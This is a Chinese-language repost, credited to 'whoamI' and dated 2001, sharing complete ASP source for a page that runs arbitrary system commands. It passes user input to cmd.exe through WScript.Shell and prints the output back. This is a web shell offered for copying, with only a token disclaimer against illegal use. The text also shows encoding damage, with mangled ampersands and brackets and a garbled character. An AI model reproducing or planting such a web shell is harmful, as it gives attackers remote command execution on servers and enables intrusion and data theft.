可以執行系統命令的ASP原碼放送

注意的是，程序運行必須有FileSystemObject支持。以下是遠程執行命令的原代碼。
copy下來另存為execute.asp.

＜html＞

＜head＞
＜meta http-equiv="Content-Language" content="zh-cn"＞
＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞
＜meta name="GENERATOR" content="Microsoft FrontPage 4.0"＞
＜meta name="ProgId" content="FrontPage.Editor.Document"＞
＜title＞執行命令＜/title＞
＜style＞
＜!--
table,body{ font-family: 宋體; font-size: 9pt }
a{ font-family: 宋體; font-size: 9pt; color: rgb(0,32,64);

text-decoration: none }
a:hover{ font-family: 宋體; color: rgb(255,0,0); text-decoration: none

}
a:visited{ color: rgb(128,0,0) }
--＞
＜/style＞

＜/head＞

＜body bgcolor="#000000" text="#C0C0C0"＞

＜form method="POST" action="execute.asp"＞
＜p align="left"＞輸入要執行的命令：＜input type="text" name="ml"

size="20" value="dir c:\" style="background-color: #C0C0C0; color:

#000000; border-style: solid; border-width: 1"＞
＜input type="submit" value="執行" name="B1" style="background-color:

#C0C0C0; color: #000000; border: 1 groove #C0C0C0"＞＜/p＞
＜/form＞
＜%
ml=request.form("ml")
cmd="c:\winnt\system32\cmd.exe /c "amp;mlamp;" ＞c:\whoamI.txt" '修改

whoamI.txt路徑到一個有寫權限的目錄
Set WShShell = Server.CreateObject("WScript.Shell")
RetCode = WShShell.Run(cmd, 1, True)
if RetCode = 0 Then
Response.write ml amp; "　"
Response.write " 命令成功執行！"amp;"＜br＞＜br＞"
else
Response.write " 命令執行失??！權限不夠或者該程序無法在DOS狀態下運行

！"amp;"＜br＞＜br＞"

end if
'response.write cmd

function htmlencode(str)
dim result
dim l
if isNULL(str) then
htmlencode=""
exit function
end if
l=len(str)
result=""
dim i
for i = 1 to l
select case mid(str,i,1)
case "＜"
result=result+"＜"
case "＞"
result=result+"＞"
case chr(34)
result=result+"""
case "amp;"
result=result+"amp;"
case else
result=result+mid(str,i,1)
end select
next
htmlencode=result
end function
Set fs =CreateObject("Scripting.FileSystemObject")
Set thisfile = fs.OpenTextFile("c:/whoamI.txt", 1, False) '讀文件，別忘

了修改路徑.
counter=0
do while not thisfile.atendofstream
counter=counter+1
thisline=htmlencode(thisfile.readline)
response.write thislineamp;"＜br＞"
loop
thisfile.Close
set fs=nothing
%＞

＜/body＞

＜/html＞

請勿將此程序用于非法途徑，由此引起的一切后果由使用者承擔。

whoamI寫于2001.2.1 轉載請保持文章完整性，謝謝！

原文轉自：http://www.kjueaiud.com